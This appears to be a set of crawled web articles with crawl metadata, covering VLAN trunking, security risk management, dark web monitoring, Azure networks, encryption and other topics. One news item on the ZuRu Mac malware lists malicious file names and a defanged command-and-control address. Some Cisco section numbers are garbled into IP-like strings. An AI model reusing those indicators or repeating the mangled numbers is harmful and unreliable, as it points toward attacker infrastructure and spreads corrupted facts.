send timely alerts to the cyber security team when irregularities are detected, reducing incident response times. How to mitigate cyber threats When it comes to mitigating cyber threats, prevention is always the best approach. Organizations can eliminate a wide range of potential attack vectors by continuously monitoring vulnerabilities, suspicious activity, and unauthorized access. End-user education is also crucial, especially in phishing scams and malware distribution. The more employees know about these attack methods, the less likely they will click on an infected link or hand over their sensitive data to malicious actors. Key cyber threat mitigation strategies include: - Vulnerability management: Staying on top of device, network, and system vulnerabilities is essential to any organization’s cyber security defenses. Hackers frequently leverage zero-day exploits, weak authentication, and untrained users to aid their illegal activities. By keeping all software and operating systems up to date, companies can prevent malicious actors from establishing a foothold inside their IT infrastructure. - Data loss prevention: Insulating sensitive data from unauthorized users is a top concern for companies in almost every industry, especially those collecting and storing consumer information. Developing a data backup schedule and data loss prevention system can help reduce the risk of unplanned downtime from ransomware attacks, malware, and more. Ultimately, understanding how to detect and mitigate cyber threats is only one piece of the puzzle. Companies must also establish clear internal policies to ensure that all employees follow best practices and uphold regulatory requirements. These guidelines are essential in the manufacturing industry, as a single security breach can lead to significant financial and operational disruptions. As a proud supporter of American manufacturing, Certitude Security® is working diligently to inform leaders and facilitate essential asset protection priorities for manufacturing businesses throughout the United States. When you are interested in learning about the empowerment services that Certitude Security® can offer, visit our website or coordinate a time to speak to a team member today.
<urn:uuid:b62735cf-fa1f-45f1-82ec-f1e5bb8b6a36>
CC-MAIN-2022-40
https://www.certitudesecurity.com/blog/incident-detection-response/how-to-detect-and-mitigate-cyber-threats-protecting-your-business-in-the-digital-age/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00334.warc.gz
en
0.922066
1,675
2.625
3
VLANs in a Multiswitched Environment (3.1.2) Even a small business might have more than one switch. Multiple switch configuration and design influences network performance. Trunks are commonly used to connect a switch to a switch or to another network device such as a router. VLAN Trunks (184.108.40.206) A VLAN trunk, or trunk, is a point-to-point link between two network devices that carries more than one VLAN. A VLAN trunk extends VLANs across two or more network devices. Cisco supports IEEE 802.1Q for coordinating trunks on Fast Ethernet, Gigabit Ethernet, and 10-Gigabit Ethernet interfaces. VLANs would not be very useful without VLAN trunks. VLAN trunks allow all VLAN traffic to propagate between switches, so that devices which are in the same VLAN, but connected to different switches, can communicate without the intervention of a router. A VLAN trunk does not belong to a specific VLAN; rather, it is a conduit for multiple VLANs between switches and routers. A trunk could also be used between a network device and server or other device that is equipped with an appropriate 802.1Q-capable NIC. By default, on a Cisco Catalyst switch, all VLANs are supported on a trunk port. In Figure 3-6, the links between switches S1 and S2, and S1 and S3 are configured to transmit traffic coming from VLANs 10, 20, 30, and 99 across the network. This network could not function without VLAN trunks. Figure 3-6 Trunks Controlling Broadcast Domains with VLANs (220.127.116.11) Recall that a broadcast domain includes all of the devices that receive a broadcast. When a switch is bought, removed from the packaging, and powered on, all devices attached to the switch are part of the same network or broadcast domain. When VLANs are implemented, each VLAN is its own broadcast domain. Let’s examine that concept because VLANs are commonly implemented in business. Network Without VLANs In normal operation, when a switch receives a broadcast frame on one of its ports, it forwards the frame out all other ports except the port where the broadcast was received. In the animation, the entire network is configured in the same subnet (172.17.40.0/24) and no VLANs are configured. As a result, when the faculty computer (PC1) sends out a broadcast frame, switch S2 sends that broadcast frame out all of its ports. Eventually the entire network receives the broadcast because the network is one broadcast domain. Network with VLANs As shown in the animation, the network has been segmented using two VLANs: Faculty devices are assigned to VLAN 10 and Student devices are assigned to VLAN 20. When a broadcast frame is sent from the faculty computer, PC1, to switch S2, the switch forwards that broadcast frame only to those switch ports configured to support VLAN 10. The ports that comprise the connection between switches S2 and S1 (ports F0/1), and between S1 and S3 (ports F0/3) are trunks and have been configured to support all the VLANs in the network. When S1 receives the broadcast frame on port F0/1, S1 forwards that broadcast frame out of the only other port configured to support VLAN 10, which is port F0/3. When S3 receives the broadcast frame on port F0/3, it forwards that broadcast frame out of the only other port configured to support VLAN 10, which is port F0/11. The broadcast frame arrives at the only other computer in the network configured in VLAN 10, which is faculty computer PC4. Figure 3-7 shows a network design without using segmentation compared to how it looks with VLAN segmentation, as shown in Figure 3-8. Notice how the network with the VLAN segmentation design has different network numbers for the two VLANs. Also notice how a trunk must be used to carry multiple VLANs across a single link. By implementing a trunk, any future VLAN or any PC related to assembly line production can be carried between the two switches. Figure 3-7 Network without Segmentation Figure 3-8 Networks with Segmentation When VLANs are implemented on a switch, the transmission of unicast, multicast, and broadcast traffic from a host in a particular VLAN are restricted to the devices that are in that VLAN. Tagging Ethernet Frames for VLAN Identification (18.104.22.168) Layer 2 devices use the Ethernet frame header information to forward packets. The standard Ethernet frame header does not contain information about the VLAN to which the frame belongs; thus, when Ethernet frames are placed on a trunk, information about the VLANs to which they belong must be added. This process, called tagging, is accomplished by using the IEEE 802.1Q header specified in the IEEE 802.1Q standard. The 802.1Q header includes a 4-byte tag inserted within the original Ethernet frame header, specifying the VLAN to which the frame belongs, as shown in Figure 3-9. Figure 3-9 Fields in an Ethernet 802.1Q Frame When the switch receives a frame on a port configured in access mode and assigned a VLAN, the switch inserts a VLAN tag in the frame header, recalculates the FCS, and sends the tagged frame out of a trunk port. VLAN Tag Field Details The VLAN tag field consists of a Type field, a tag control information field, and the FCS field: - Type: A 2-byte value called the tag protocol ID (TPID) value. For Ethernet, it is set to hexadecimal 0x8100. - User priority: A 3-bit value that supports level or service implementation. - Canonical Format Identifier (CFI): A 1-bit identifier that enables Token Ring frames to be carried across Ethernet links. - VLAN ID (VID): A 12-bit VLAN identification number that supports up to 4096 VLAN IDs. After the switch inserts the Type and tag control information fields, it recalculates the FCS values and inserts the new FCS into the frame. Native VLANs and 802.1Q Tagging (22.214.171.124) Native VLANs frequently baffle students. Keep in mind that all trunks have a native VLAN whether you configure it or not. It is best if you control the VLAN ID used as the native VLAN on a trunk. You will learn why in this section. Tagged Frames on the Native VLAN Some devices that support trunking add a VLAN tag to native VLAN traffic. Control traffic sent on the native VLAN should not be tagged. If an 802.1Q trunk port receives a tagged frame with the VLAN ID the same as the native VLAN, it drops the frame. Consequently, when configuring a switch port on a Cisco switch, configure devices so that they do not send tagged frames on the native VLAN. Devices from other vendors that support tagged frames on the native VLAN include IP phones, servers, routers, and non-Cisco switches. Untagged Frames on the Native VLAN When a Cisco switch trunk port receives untagged frames (which are unusual in a well-designed network), the switch forwards those frames to the native VLAN. If there are no devices associated with the native VLAN (which is not unusual) and there are no other trunk ports, then the frame is dropped. The default native VLAN is VLAN 1 on a Cisco switch. When configuring an 802.1Q trunk port, a default Port VLAN ID (PVID) is assigned the value of the native VLAN ID. All untagged traffic coming in or out of the 802.1Q port is forwarded based on the PVID value. For example, if VLAN 99 is configured as the native VLAN, the PVID is 99 and all untagged traffic is forwarded to VLAN 99. If the native VLAN has not been reconfigured, the PVID value is set to VLAN 1. In Figure 3-10, PC1 is connected by a hub to an 802.1Q trunk link. PC1 sends untagged traffic which the switches associate with the native VLAN configured on the trunk ports, and forward accordingly. Tagged traffic on the trunk received by PC1 is dropped. This scenario reflects poor network design for several reasons: it uses a hub, it has a host connected to a trunk link, and it implies that the switches have access ports assigned to the native VLAN. But it illustrates the motivation for the IEEE 802.1Q specification for native VLANs as a means of handling legacy scenarios. A better designed network without a hub is shown in Figure 3-11. Figure 3-10 Native VLAN on 802.1Q Trunk Figure 3-11 Better Native VLAN Design Voice VLAN Tagging (126.96.36.199) As shown in Figure 3-12, the F0/18 port on S3 is configured to be in voice mode so that voice frames will be tagged with VLAN 150. Data frames coming through the Cisco IP phone from PC5 are left untagged. Data frames destined for PC5 coming from port F0/18 are tagged with VLAN 20 on the way to the phone. The phone strips the VLAN tag before the data is forwarded to PC5. Figure 3-12 Voice VLAN Tagging The Cisco IP phone contains an integrated three-port 10/100 switch. The ports provide dedicated connections to these devices: - Port 1 connects to the switch or other VoIP device. - Port 2 is an internal 10/100 interface that carries the IP phone traffic. - Port 3 (access port) connects to a PC or other device. When the switch port has been configured with a voice VLAN, the link between the switch and the IP phone acts as a trunk to carry both the tagged voice traffic and untagged data traffic. Communication between the switch and IP phone is facilitated by the Cisco Discovery Protocol (CDP). Look at the sample output. S1# show interfaces fa0/18 switchport Name: Fa0/18 Switchport: Enabled Administrative Mode: static access Operational Mode: down Administrative Trunking Encapsulation: dot1q Negotiation of Trunking: Off Access Mode VLAN: 20 (student)Trunking Native Mode VLAN: 1 (default) Administrative Native VLAN tagging: enabled Voice VLAN: 150 (voice)<output omitted> A discussion of voice Cisco IOS commands are beyond the scope of this course, but the highlighted areas in the sample output show the F0/18 interface configured with a VLAN configured for data (VLAN 20) and a VLAN configured for voice (VLAN 150).
<urn:uuid:b24ea474-c353-4892-a818-601a536c2ed4>
CC-MAIN-2022-40
https://www.ciscopress.com/articles/article.asp?p=2181837&seqNum=5
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00334.warc.gz
en
0.880275
2,319
3.34375
3
In the past couple of articles we have considered why security is important and what are the threats faced, both internal and external. Most, if not all organisations will be doing something about IT security, so it isn’t going to be awfully useful to launch into a treatise on how everybody should be implementing IT security. It is perhaps worth revisiting some of the key elements of ‘security done right’, however, so we can consider what’s getting in the way. At the heart of all good security practice lies risk management, a discipline shared with such areas as business continuity planning and Health and Safety practice. Done right, risk management considers business risks first and foremost – indeed it would be fair to say that business risks are the only ones that matter (or to put it another way, if your organisation is unlikely to suffer as a result of a given threat, it’s not really going to be worth dealing with). It’s important to note of course that risks can be both technical and non-technical. Of course we have the ongoing dangers of theft or other malicious intent, which need to be protected through physical, technical and policy means. However many other risks may exist in the course of normal, day-to-day operations. Consider mobile phones for example, or instant messaging, home working or managing subcontractors. Each of these has a technical aspect – a phone could contain confidential contact lists for example, or home working could result in un-vetted individuals (i.e. the kids) running unauthorised software. But even in these cases it is important to consider any risks from a business perspective – what would be the impact of losing such a contact list, or of a child playing games? Risk, then, needs to cover all areas, not just the more obvious ones. From this, eminently sensible starting point it is worth bringing up the topic of security standards, or in particular ISO 27001 (BS7799). Essentially, what the standard expresses is that to do security right, you first need a security management system that defines how security is to be done in your organisation; then, you need to actually do what it is you said you would do, one element of which is to re-assess the risks and review the measures in place on a regular basis. It is hard to imagine how security best practice could be expressed more pragmatically or practically than the one-two-three of identifying the risks, deciding what to do about them and then doing it. We do know however that many organisations are operating security in a sub-optimal manner. There is even evidence that organisations are actively avoiding working through these things, for fear of what they might find. This is the equivalent of driving down a busy road with a blindfold on, for fear of what one might see. In a more proactive world, in which the business risks are well understood, IT security measures can then go some way towards mitigating them. We spell this out in such terms because as we have already mentioned, IT security is about all of people, process and technology. It is here however that we hit the second challenge – that of applying solutions to securing the organisation, which take into account threats to the business coming from both outside and inside the organisation. In principle, IT security measures ‘should’ be considered, designed and implemented in a holistic manner. From a technical perspective as well, security ‘should’ be considered across the architecture – the term ‘defence in depth’ is used to describe how the IT environment can be considered as a series of nested zones, each of which can be secured according to its own needs and with its own boundaries. In practice however, while many organisations may indeed take their security responsibilities seriously, few achieve a level of security that could be called optimal. There are many reasons for this, the main one of which is that, bluntly, security is extremely hard to get right. It is a fine aspiration indeed to define and deploy a hardened security environment – but many (if not all) security measures can also have a detrimental effect on the business itself – indeed, too much security can be a business risk. It is perhaps unsurprising then, that the security measures in place tend towards those which are easier to define and deploy. We can see evidence for this in the chart below, which shows what security products organisations have already implemented, or are planning on implementing. As can be seen from the chart, there are essentially three ‘bands’ of security measures. The top band we could refer to as point products – antivirus, VPN and the like, which are already implemented by the majority of organisations. Languishing at the bottom are those security technologies we could consider as ‘architectural’ – for example, security event management and behavioural analysis technologies. So, what’s the answer – are the majority of organisations destined to have willing hearts but weak bodies when it comes to implementing IT security? The answer is probably yes – unless either legislation or accepted corporate behaviour take a leap forward. Ultimately however it is the risks, and how well they are mitigated, that should define whether or not an organisation has got things right. To take a specific example, an organisation may or may not have implemented an intrusion detection system (IDS). Far more important however is the knowledge of what information should be considered as confidential and to whom, and whether it is adequately protected against all the risks it may face. In security, then, risk management offers both a start and end point. It is perhaps ironic that kicking off a risk management exercise, or a re-assessment of the risk register, need not be an onerous task – particularly if the 80:20 rule is applied appropriately. Indeed, not doing this is perhaps the biggest risk of all.
<urn:uuid:fdb28b3d-662d-4af3-8ee0-7127b6187db7>
CC-MAIN-2022-40
https://www.freeformdynamics.com/uncategorized/securing-the-corporation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00334.warc.gz
en
0.967522
1,197
2.546875
3
The anonymity of the dark web is what makes it dangerous. It allows hackers to roam without surveillance, making it the center for illicit activities. Understanding the dark web, data breaches, how to react if your sensitive data is exposed, and how to protect your sensitive information can help save your data from falling into the wrong hands. What is the Dark Web? The dark web is an area of the internet that is not available through traditional search engines that consists of a network of websites, forums, and communication tools used to run a suite of security tools that help anonymize web traffic. It’s a huge market for criminal activity, especially for stolen data. Data is a hot commodity on the dark web, where people buy and sell sensitive information, much of it stolen through network breaches. Your business credentials are most likely on the dark web right now. You should be leveraging dark web scanning to see what information is out there and understand the steps you need to take to protect compromised accounts. What is a Data Breach? A data breach is a release of confidential information in an untrusted environment. Usernames, passwords, account numbers, financial records, credit card details, medical records, etc. are up for grabs if you do not have the precautions in place to safeguard your data. With today’s clever cyberattacks, it’s not a matter of if, but when your organization will be breached. Cybercriminals can use your stolen data to commit identity theft, fraud, or infiltrate your network to go after your business and financial accounts. Stay Off the Dark Web and Avoid a Data Breach It is imperative to protect your business’s sensitive information from the dark web. By understanding the risks that the dark web poses, you can take the appropriate precautions for your company by implementing and maintaining strong cyber-privacy practices. Such practices include continually monitoring the dark web, so you’re notified the moment your information is at risk. A couple of ways to protect your information from the dark web: - Implement Multi-Factor Authentication (MFA) for all Internet-accessible services. You should establish strict password and account rules for everyone in your organization. - Train your employees to be aware of security threats, and how to counter them. - Never share usernames and passwords. If credentials are shared, make sure you change them immediately to avoid a compromise. - Have a plan in place for security incidents, and make sure that your employees understand their role in mitigating risk. - Leverage Dark Web Monitoring services. Some security organizations can track the dark web for any information or activity related to your organization. There are many more ways to protect your information from leaking on the dark web. You need to make sure you and your team are prepared to respond quickly and effectively when a data breach inevitably occurs. Having some of these practices in place will give you peace of mind that you’re taking the necessary steps to protect your organization’s data and reputation. How We Can Help Our Dark Web Monitoring services provide your organization with protection against data breaches. We conduct a monthly scan of the dark web marketplaces, where stolen information is bought and sold. If any of the client’s employees’ credentials appear in our scan, that means there has been a data leak. We will inform you of the leak through a report that we will generate and deliver after every scan. By being aware of the leak, you can take action to remediate any exposed credentials and know which account(s) to review for any malicious activity. We apply our Framework for Successful IT approach to all aspects of our outsourced IT services and consulting. Find out how our team can inform you of any malicious activity and keep your business’s data off the dark web.
<urn:uuid:48695e67-9d9f-4d3e-b94e-3310cc89dcdf>
CC-MAIN-2022-40
https://aldridge.com/your-data-is-on-the-dark-web-now-what/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00334.warc.gz
en
0.909494
778
3.078125
3
In China, a new Mac virus called ZuRu has been discovered. Victims get infected through malicious Baidu search engine results. The hackers spread it through the iTerm2 application, a free alternative app to the default Mac terminal. On September 14, a security researcher found ZuRu for the first time. On the same day, another security researcher spotted it and documented it on a Chinese blog. Here are the key points about this malware: - When searching for iTerm2 on Baidu, a cloned version of the original iTerm2 website appears. - Users who download the counterfeit installer from the iTerm2 website receive a fully functional but fake copy of the app. - Because it is digitally certified by an Apple developer, this malicious copy bypasses Gatekeeper and gets installed as usual. - However, the fake software doesn’t have the additional security badge that Apple typically gives to notarized applications. Along with the malicious iTerm2 application, one more add-on was discovered – a downloader that attempts to connect to an internet server before installing two more pieces of malware. The malicious application seems to be a legitimate version of iTerm2 with a file that loads and runs the dangerous libcrypto[.]2[.]dylib dynamic library to carry out harmful operations. - The primary objective is to connect to 184.108.40.206 and download a Python file termed g[.]py, and a Mach-O binary termed GoogleUpdate to the /tmp folder, then run both files. - The GoogleUpdate binary is extensively encrypted and connects with a Cobalt Strike server (47.75.96[.]198:443), a beacon that would give the attacker full backdoor access. - Furthermore, researchers found other trojanized applications using the identical libcrypto[.]2[.]dylib files – Microsoft Remote Desktop, SecureCRT, and Navicat Premium. Both Apple and Baidu have taken steps to remove the malicious search results from their platforms. Although attackers will have no difficulty replicating these procedures in fresh attacks, users and security experts should be wary of such dangers.
<urn:uuid:72ef1ecd-b5e8-44e8-a1cc-8432f32300ba>
CC-MAIN-2022-40
https://cyberintelmag.com/malware-viruses/baidu-search-results-exploited-by-zuru-malware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00334.warc.gz
en
0.901503
442
2.53125
3
During a heart attack, the supply of oxygen to heart cells is decreased. This reduced oxygen level, called hypoxia, causes the cell’s powerhouses, the mitochondria, to fragment, impairing cell function and leading to heart failure. Until now, few details have been known about how this process occurs. Researchers at the National Institute for Physiological Sciences, Japan, have revealed how filamin A, a key component of the cell skeleton, interacts with the protein Drp1 in hypoxic conditions to facilitate mitochondrial fission. Furthermore, the researchers discovered that the drug cilnidipine can prevent this damaging process. The researchers obtained these findings by studying mouse and rat models of heart attacks and examining the action of filamin A and Drp1 in various settings. They recently published their research in Science Signaling. “Our results demonstrate that filamin A helps to bind Drp1 to the mitochondria,” corresponding author Motohiro Nishida says. “When cell oxygen is low, this binding process activates Drp1 and causes the mitochondria to fragment.” The researchers used a surgical mouse model of heart attack along with various immunochemical methods and an analysis of sub-cellular components for investigation. Their work determined that hypoxic stress activated the interaction of filamin A with Drp1 and increased Drp1 activity in rat heart cells. The mechanism of how the Drp1 and filamin A interaction is regulated when oxygen is low is currently unknown. However, both knockdown and inhibition of Drp1 limited the mitochondrial fragmentation. In a final analysis, the researchers showed that the drug cilnidipine helps to prevent the resulting damage to heart cells. This is important because there are currently no clinically applicable drugs that regulate the mitochondrial fission process in heart disease. “By using cilnidipine, we were able to reduce heart failure in mice after a heart attack,” study lead author Akiyuki Nishimura says. “This is because cilnidipine suppresses Drp1-filamin A complex formation, which thereby reduces mitochondrial fission.” Results from the study indicate that the damage to heart cells as a result of the Drp1-filamin A complex does not occur when oxygen levels are normal. These findings are promising for future research aimed at preventing mitochondrial fission in response to hypoxic conditions. Preventing fission could preserve heart function after a heart attack or in the presence of cardiovascular disease. More information: Akiyuki Nishimura et al, Hypoxia-induced interaction of filamin with Drp1 causes mitochondrial hyperfission–associated myocardial senescence, Science Signaling (2018). DOI: 10.1126/scisignal.aat5185 Journal reference: Science Signaling search and more info website Provided by: National Institutes of Natural Sciences
<urn:uuid:e209f205-196c-4ab6-b92a-b1250618763b>
CC-MAIN-2022-40
https://debuglies.com/2018/11/19/during-a-heart-attack-the-hypoxia-causes-impairing-cell-function-and-leading-to-heart-failure/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00334.warc.gz
en
0.892263
613
3.46875
3
Despite today’s rapid evolution in personal technology, there are incredible distinctions found between the average user’s purchases, practices, and overall knowledge of cyber technology protection. From well-seasoned experts who are fully adept at incorporating the most essential technology to protect their devices, to novice-level beginners who may fully believe that a free online version of antivirus software is sufficient protection for their needs; there remains an incredible disparity in the know-how of proceeding safely in today’s digital world looking with an assortment of ominous threats. For beginners looking for the most straightforward answer to their questions about needing both a firewall and antivirus: the unequivocal answer is yes. You do need a powerful antivirus program and an equally robust firewall to adequately protect your device. Read on below to learn the easy-to-understand reasons why you need both a firewall and antivirus, how they serve to protect you, and the most common FAQs. Seriously, don’t feel embarrassed if you don’t know the difference between a firewall vs. antivirus. You’d be surprised how many millions of people have no idea how antivirus and firewall mechanisms work. Despite all the hipsters you might see at Starbucks typing away confidently on their all-important work, you really would be shocked at the answers you might receive if you were to pose the question of what a firewall vs. antivirus is. Antivirus programs and Firewalls work together in tandem to provide the maximum protection of your device from any incoming, intruding malicious cyber threats. What is Antivirus? Antivirus software is the singularly most used cybersecurity tool used to protect PCs, Macs, an assortment of devices, and is heavily invested in by international corporations, institutions, and businesses of all kind to protect from any kind incoming threat. In essence, it is a business’s armor from attack. Antivirus software operates through scanning files and entire systems, detecting instances of harm, and removing the discovered threats to keep data, devices, and businesses infection free. The depth and breadth of antivirus software vary widely. From versions that are free of cost to versions business-oriented versions that are pricey enough to raise an eyebrow, there are antivirus programs available on the market for at-home users to the largest corporations in the world who are heavily invested in the business of cybersecurity. Clearly, the more expensive antivirus programs will come with a bevy of extra perks and benefits, many of which larger businesses appreciate as they attempt to build a comprehensive suite of protective tools that leave no available option for any type of digital threats. What is a firewall? A firewall acts as “armor” between your device’s network and the world wide web. It effectively motors any incoming and outgoing traffic from your system and ultimately prevents any suspicious packets going in or out of your system and prevents the suspicious packets from entering/leaving the network. Think of your firewall as your bouncer. When troublesome drunken clients try to come into your establishment, your bouncer contends with them easily, never letting them into the front door to cause you any problems. Taking a glance at the key differences between firewalls vs. antiviruses will likely help you come to a comprehensive understanding of the differences and how they ultimately work together in a protective manner. A Firewall is akin to an armor that prevents infected and malicious software and packets from entering your system. Antivirus provides the protection of your PC, device, or network, and scans detects, and removes infected files. Every single day, PCs, Macs, different devices, and networks are infected with viruses, malicious data, and much more. Cyberdata protection has grown immensely with each passing year. However, the level of sophistication found in hacking attempts has also grown with malicious threats teeming with complexities on a never-before-seen basis. Maintaining a sufficient level of security for your device isn’t something that you should fret about. Many articles will make it sound a lot more complex than it needs to be. Yes, you need to have a multi-layered level of security, but those layers are simple. In a highly-condensed nutshell, if you are beginner or novice user, make sure you have your firewall in place and in the “on” mode and install an antivirus program, perhaps considering a subscription plan with a few extra perks and benefits. The cyber world in its current incarnation can prove to be vastly confusing, especially to beginners, as the advances in tech surge, rendering many seemingly “new” devices” obsolete in the blink of an eye. In today’s technological times, data security is of paramount importance; it safeguards our identification, financial details, and critical business information. Through the tandem protection of firewall protection and powerful antivirus software, users can confidently monitor their network traffic, prevent the intrusion of malicious data into their device, and not have to worry about the theft of sensitive personal details.
<urn:uuid:f8fad2b4-045c-4493-8dba-95ac63db040a>
CC-MAIN-2022-40
https://antivirusrankings.com/firewall-vs-antivirus-the-basics-and-faqs
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00534.warc.gz
en
0.937801
1,037
2.59375
3
Virtual Network (VNet) Learning Center | Glossary | Virtual Network (VNet) What is an Azure Virtual Network (vNet)? Azure vNet Operations Azure Virtual Network allows many types of Azure resources, such as Azure virtual machines (VMs), to communicate securely with each other, with the Internet, and with local networks. The scope of a virtual network is a single region; however, several virtual networks of different regions can be connected together by virtual network pairing. Azure Virtual Network provides the following important functionalities: Isolation and segmentation You can deploy multiple virtual networks within each subscription and Azure region. Each virtual network is isolated from the other virtual networks. - Specify a private IP address space through public and private addresses (RFC 1918). Azure assigns a private IP address to the resources of a virtual network from the address space that you assign. - Segment the virtual network into one or more subnets and assign a part of the address space of the virtual network for each subnet. - Use the name resolution provided by Azure or specify your own DNS server to be used by resources connected to a virtual network. You can filter network traffic between subnets using one or both of the following options: - Security groups: network security groups and application security groups can contain several security rules of entry and exit that allow you to filter the traffic arriving and leaving the resources by IP address, port, and protocol of origin and destination. For more information, see network security groups and application security groups. - Virtual network Appliance: A virtual network application is a virtual machine that executes a network function, such as a firewall, WAN optimization or other network function. To see a list of virtual network applications that can be deployed in a virtual network, see Azure Marketplace. By default, Azure routes traffic between subnets, connected virtual networks, local networks, and the Internet. You can implement one or both of the following options to replace the default routes Azure creates: - Route tables: you can create custom route tables with the routes that control where traffic is routed to each subnet. More information on route tables. - Border Gateway Protocol (BGP) Paths: If you connect the virtual network to your local network through an Azure VPN Gateway or ExpressRoute connection, you can propagate local BGP routes to your virtual networks. More information about the use of BGP with Azure VPN Gateway and ExpressRoute.
<urn:uuid:c73f18c7-cc01-4462-859e-ec92132351c0>
CC-MAIN-2022-40
https://aviatrix.com/learn-center/glossary/vnet/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00534.warc.gz
en
0.861027
514
2.890625
3
You’ve probably heard these words in the news relating to jobs loss or future jobs. What all these words have in common is they are all derived from coding. Coding is the backbone of all the technology that powers our devices we use daily: phones, computers, etc. Most of the mundane, repetitive processes that are used by human labor today will eventually be replaced by computers powered by code; they can work longer, faster and more efficiently than humans. For example, the average job in most states in the U.S. is truck driving. In the next 25 years alone, automation powered by code will replace an estimated nearly 300,000 truckers. Self-driving trucks will be able to drive longer, more safely and more cost-efficiently than human drivers. From drones, self-driving technology and robotics, the future of the world is powered by code. Developers and engineers with coding knowledge are well compensated and are in shortage in today’s workforce. Software developers have an average salary of $100K, with above average work-life balance, and average stress levels. Additionally, IT and programming roles at companies are expected to grow by 30% by the year 2026. Coding provides a career with high future growth, great work-life balance, and a comfortable living. The real question is how can you learn code and equip yourself with the skills necessary to be a part of the future workforce. Now that you’ve seen how code empowers the apps, platforms, and devices that make up most of our world, what are the steps you need to take to become a professional developer and use code to make a significant impact in the world? Learning to code can be accelerated exponentially by going through a coding boot camp. A coding boot camp is an intense, fast-paced environment where you can learn to code under the supervision of developers who guide you day to day. After the completion of a bootcamp, you will have an employable skill set and can work for companies that are in need of coding expertise. At a Max Bootcamp, students have a 93% job placement rate and IT coaches go through every step of finding employment including resume writing and interview skills. Sign up here for a free 10-minute consultation with a career adviser or a placement Coach! Your email address will not be published. Job role *
<urn:uuid:15fdfb47-3ab2-47ba-897c-3d4c2736c2f4>
CC-MAIN-2022-40
https://maxtrain.com/blog-post/how-do-i-learn-to-code/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00534.warc.gz
en
0.951116
611
2.78125
3
Data encryption is one of the most important elements in any cybersecurity strategy, since it keeps data safe even if it lands in the wrong hands. You can encrypt data as it’s stored on your hard drive, online storage or any other system, or when it’s being transmitted across the web. The main purpose of encryption is to keep digital data safe, and modern data encryption algorithms are practically impossible to hack using current technology. As such, encryption plays a critical role in the integrity and authentication of confidential data, such as payment details or any personally identifiable information. You’ll encounter encryption whenever shopping online or accessing any website or web application that requires you to enter a password, as indicated by the padlock icon next to the address bar in your browser. Mankind has been encrypting messages for thousands of years, with the most basic methods involving a simple cipher. Of course, these methods are very basic and insecure, and any modern computer can crack them in a matter of minutes. As computers get faster, and thus more capable of cracking dated encryption methods, it becomes necessary to use more complex algorithms that cannot, to all intents and purposes, be cracked. Modern encryption technology relies on ever larger key sizes to conceal encrypted data. The larger the key size, the longer it would take for a brute-force attack to successfully decrypt the scrambled plaintext. Most modern encryption algorithms use a 128-bit key, which would require a brute-force attack to try 339 decillion (that’s 33 zeros) possible combinations. In other words, it’s practically impossible to crack using today’s computers since it would take trillions of years. Some algorithms use 192- or 256-bit keys, which will likely become the new industry standard as technology moves ahead. An essential step to take in formulating any cybersecurity strategy is to define which data is sensitive and determine precisely where it is being stored and transmitted and who has access to it. Absolutely all potentially sensitive data should be encrypted, regardless of where you keep it. It’s also important to encrypt internet traffic, particularly if you have a mobile workforce whereby employees regularly access corporate apps and data over connections you have no control over, such as public WiFi hotspots. To make your data unusable to eavesdroppers, you should always use a virtual private network (VPN), which will encrypt your traffic by rerouting it through a trusted third party. Other data you should encrypt includes those kept on cloud storage platforms or stored and transmitted over email. Most service providers provide automatic encryption for data storage and transit. Nonetheless, if you’re using a public cloud service like Dropbox or OneDrive, you’ll probably want to add an additional layer of encryption that you have complete control over. Dyrand Systems provides complete IT services to businesses seeking an affordable and secure way to build a cloud-based computing infrastructure where your data is always safe from prying eyes. Call us today to find out what we can do for you.
<urn:uuid:63cb94dd-fc63-40e8-9180-686d4d03a5b2>
CC-MAIN-2022-40
https://dyrand.com/how-does-data-encryption-work-and-what-should-you-apply-it-to/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00534.warc.gz
en
0.921195
616
3.671875
4
Many companies have responded to the difficulties and uncertainties of COVID-19 by asking their employees to work remotely. The shift to work-from-home is a necessary and practical step to combat spread of the virus. But even if many industries were already becoming more remote-worker friendly, the abruptness of this crisis has created new challenges for those who depend on data and information to fulfill their responsibilities. Business decision makers at all levels need current and reliable information to navigate the turbulence of economic uncertainties, rapidly changing social conditions, and strategic volatility. As the importance of rapid and real-time data analysis increases, the challenges and complexities of analytics are also expanding. For many organizations, the collaborative nature of data analysis is inhibited when decision makers, data subject matter experts, data engineers, and data analysts are not able to meet face-to-face. The Challenges of Remote Data Analytics Data analysis and data science are complex processes in the best of conditions. The work begins with understanding the requirements—knowing what information is needed—not as a project phase, but as an ongoing process of exploration and discovery that demands collaboration between decision makers (information consumers) and data analysts (information producers). Communication and continuous feedback are essential but difficult to achieve when everyone involved works remotely. Getting from requirements to analysis-ready data is a multi-step and iterative process that involves finding data for analysis, understanding and evaluating the data, and preparing data for analysis. Data analysts often rely on tribal knowledge to help them find data. The marginal effectiveness of tribal knowledge networks is certain to suffer when those with knowledge all work in different remote locations. Next, the analyst works intensely to explore, understand, cleanse, blend, and prepare data for analysis—work that by some estimates accounts for 80% of analytics work that is not spent analyzing data and that is a barrier to rapid and agile analytics. Sharing of data, data knowledge, and data preparation processes helps to accelerate data preparation work. But this kind of sharing typically depends on tribal knowledge networks. With prepared data, the core data analysis work occurs—choosing analysis techniques and statistical methods, designing data visualizations, and interpreting the data. Data analysis at its best is an iterative process where each cycle of analysis finds meaning, generates ideas, and sparks insights that lead to deeper and richer analysis. But this kind of analysis is as much a human and cultural 